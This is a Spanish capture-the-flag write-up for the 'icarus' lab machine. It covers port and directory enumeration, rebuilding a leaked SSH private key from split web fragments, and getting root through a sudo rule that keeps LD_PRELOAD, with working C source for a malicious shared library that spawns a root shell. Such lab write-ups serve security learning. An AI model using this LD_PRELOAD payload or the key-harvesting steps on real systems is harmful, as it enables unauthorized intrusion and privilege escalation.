Enumeración
Comenzamos con un escaneo general y específico de puertos con nmap:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.104
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-16 19:23 -04
Nmap scan report for 192.168.1.104
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b6:65:56:40:8d:a8:57:b9:15:1e:0e:1f:a5:d0:52:3a (RSA)
| 256 79:65:cb:2a:06:82:13:d3:76:6b:1c:55:cd:8f:07:b7 (ECDSA)
|_ 256 b1:34:e5:21:a0:28:30:c0:6c:01:0e:b0:7b:8f:b8:c6 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: LOGIN
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.93 secondsClave SSH partida en cientos de fragmentos
Enumeramos directorios con gobuster. Aparecen cientos de rutas tipo /xaa, /xab, /xac... (de 1 byte cada una) y un archivo /a:
❯ gobuster dir -u 'http://192.168.1.104' -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,gif,zip -r
...
/index.php (Status: 200) [Size: 407]
/login.php (Status: 200) [Size: 407]
/xml (Status: 200) [Size: 1]
/a (Status: 200) [Size: 9641]
/xxx (Status: 200) [Size: 1]
/xsl (Status: 200) [Size: 1]
/xbl (Status: 200) [Size: 1]
/xap (Status: 200) [Size: 1]
... (cientos de rutas de 1 byte)Descargamos el archivo /a y dentro encontramos un listado con los nombres de todos esos fragmentos. Los nombres (xaa, xab, ...) son los que genera split, lo que sugiere que se trata de un archivo grande partido en trozos. Los descargamos todos con un bucle:
❯ for FILE in $(cat a);do wget "http://192.168.1.104/$FILE" ;doneY los concatenamos en orden con cat, reconstruyendo una clave SSH privada:
❯ /bin/cat *
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----Para descubrir a qué usuario pertenece, derivamos su clave pública, cuyo comentario revela el nombre:
❯ chmod 600 id_rsa
❯ ssh-keygen -y -f id_rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarusNos conectamos por SSH como icarus:
❯ ssh icarus@192.168.1.104 -i id_rsa
The authenticity of host '192.168.1.104 (192.168.1.104)' can't be established.
ED25519 key fingerprint is SHA256:660u5ypkdYgsNIlyihIzWKWZ4ybowDRXYgPzokVbtTI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.104' (ED25519) to the list of known hosts.
Linux icarus 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 31 10:13:56 2020 from 192.168.1.58
icarus@icarus:~$Obtenemos shell como icarus y la primera flag.
Escalada de privilegios (sudo LD_PRELOAD)
Revisamos sudo -l:
icarus@icarus:/tmp$ sudo -l
Matching Defaults entries for icarus on icarus:
env_reset, mail_badpass, env_keep+=LD_PRELOAD,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icarus may run the following commands on icarus:
(ALL : ALL) NOPASSWD: /usr/bin/idLa configuración conserva la variable de entorno LD_PRELOAD (env_keep+=LD_PRELOAD), que se usa para cargar bibliotecas compartidas antes que las del sistema (LD_PRELOAD). Creamos una librería maliciosa cuyo constructor _init lanza una shell de root:
❯ cat pwnlib.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
int _init(void)
{
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("/bin/bash");
}La compilamos en la víctima y la cargamos a través del sudo id que tenemos permitido:
icarus@icarus:/tmp$ gcc -shared -o pwnlib.so -fPIC pwnlib.c -nostartfiles
icarus@icarus:/tmp$ sudo LD_PRELOAD=/tmp/pwnlib.so id
root@icarus:/tmp#Obtenemos la segunda flag.
Fin.